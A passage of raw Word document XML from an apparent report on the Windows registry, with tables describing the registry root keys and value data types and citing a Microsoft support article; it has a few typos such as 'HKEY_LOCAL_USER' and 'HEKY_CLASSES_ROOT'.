        <w:gridCol w:w="3380"/>
        <w:gridCol w:w="5390"/>
      </w:tblGrid>
      <w:tr w:rsidR="00525B3D" w:rsidTr="004B1D3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRPr="004B1D3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Root key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRPr="004B1D3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_LOCAL_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile. This key is sometimes abbreviated as "HKCU."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_USERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a subkey of HKEY_USERS. HKEY_USERS </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t>is</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve"> sometimes abbreviated as "HKU."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">Contains configuration information </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t>particular to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve"> the computer (for any user). This key is sometimes abbreviated as "HKLM."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HEKY_CLASSES_ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="004B1D3D">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Is a subkey of HKEY_LOCAL_MACHINE\</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Software. The information that is stored here makes sure that the correct program opens when you open a file by using Windows Explorer. This key is sometimes abbreviated as "HKCR." Starting with Windows 2000, this information is stored under both the HKEY_LOCAL</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_MACHINE and HKEY_CURRENT_USER keys. The HKEY_LOCAL_MACHINE\Software</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">\Classes key contains default settings that can apply to all users on the local computer. The HKEY_CURRENT_USER\Software\Classes key contains settings that override the default settings and apply only to the interactive user. The HKEY_CLASSES_ROOT key provides a view of the registry that merges the information from these two sources. HKEY_CLASSES_ROOT also provides this merged view for programs that are designed for earlier versions of Windows. To </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:lastRenderedPageBreak/>
              <w:t>change the settings for the interactive user, changes must be made under HKEY_CURRENT</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_USER\Software\Classes instead of under HKEY_CLASSES_ROOT. To change the default settings, changes must be made under HKEY</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_LOCAL_MACHINE\Software\Classes. If you write keys to a key under HKEY_CLASSES_</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>ROOT, the system stores the information under HKEY_LOCAL_MACHINE\Software\Classes. If you write values to a key under HKEY</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_CLASSES_ROOT, and the key already exists under HKEY_CURRENT_USER\Software</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>\Classes, the system will store the information there instead of under HKEY_LOCAL</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_MACHINE\Software\Classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="004B1D3D" w:rsidP="00ED091A">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:t>Contains information about the hardware profile that is used by the local computer at system startup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00ED091A" w:rsidRDefault="00ED091A" w:rsidP="00ED091A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc485303800"/>
      <w:r w:rsidRPr="00ED091A">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4</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Root keys and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00ED091A" w:rsidRPr="00ED091A" w:rsidRDefault="00ED091A" w:rsidP="00ED091A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00ED091A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008E4183" w:rsidRPr="008E4183" w:rsidRDefault="008E4183" w:rsidP="000C11BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4183">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry Data Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00281521" w:rsidRDefault="00BE5065" w:rsidP="000C11BF">
      <w:r>
        <w:t>A registry hive</w:t>
      </w:r>
      <w:r w:rsidR="008E4183">
        <w:t xml:space="preserve"> also contains values specify the information that system can use for its operation. A hive can store as many value as it wants and a value can be anything, but its type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E4183">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E4183">
        <w:t xml:space="preserve"> obey the predefined system registry value type. </w:t>
      </w:r>
      <w:r w:rsidR="00281521">
        <w:t>The table below describes the registry types and their descriptions.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1923"/>
        <w:gridCol w:w="3294"/>
        <w:gridCol w:w="3553"/>
      </w:tblGrid>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_BINARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Raw binary data. Most hardware component information is stored as binary data and is displayed in Registry Editor in hexadecimal format.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>DWORD Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">Data represented by a number that is 4 bytes long (a 32-bit integer). Many parameters for device drivers and services are this type and are displayed in </w:t>
            </w:r>
            <w:r w:rsidRPr="001670A1">
              <w:lastRenderedPageBreak/>
              <w:t>Registry Editor in binary, hexadecimal, or decimal format. Related values are DWORD_LITTLE_ENDIAN (least significant byte is at the lowest address) and REG_DWORD_BIG_ENDIAN (least significant byte is at the highest address).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1891"/>
              </w:tabs>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Expandable String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_EXPAND_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A variable-length data string. This data type includes variables that are resolved when a program or service uses the data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Multi-String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A multiple string. Values that contain lists or multiple values in a form that people can read are generally this type. Entries are separated by spaces, commas, or other marks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A fixed-length text string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_RESOURCE_LIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A series of nested arrays that is designed to store a resource list that is used by a hardware device driver or one of the physical devices it controls. This data is detected and written in the \ResourceMap tree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t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_RESOURCE_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REQUIREMENTS_LIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">A series of nested arrays that is designed to store a device driver's list of possible hardware resources the driver or one of the physical devices it controls can use. The system writes a subset of this list in the \ResourceMap tree. This data is </w:t>
            </w:r>
            <w:r w:rsidRPr="001670A1">
              <w:lastRenderedPageBreak/>
              <w:t>detected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lastRenderedPageBreak/>
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_FULL_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>RESOURCE_DESCRIPTOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A series of nested arrays that is designed to store a resource list that is used by a physical hardware device. This data is detected and written in the \HardwareDescription tree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t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_NONE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1002"/>
              </w:tabs>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">Data without any </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001670A1">
              <w:t>particular type</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001670A1">
              <w:t>. This data is written to the registry by the system or applications and is displayed in Registry Editor in hexadecimal format as a Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_LINK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A Unicode string naming a symbolic link.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>QWORD Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_QWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="00DC7DDE">
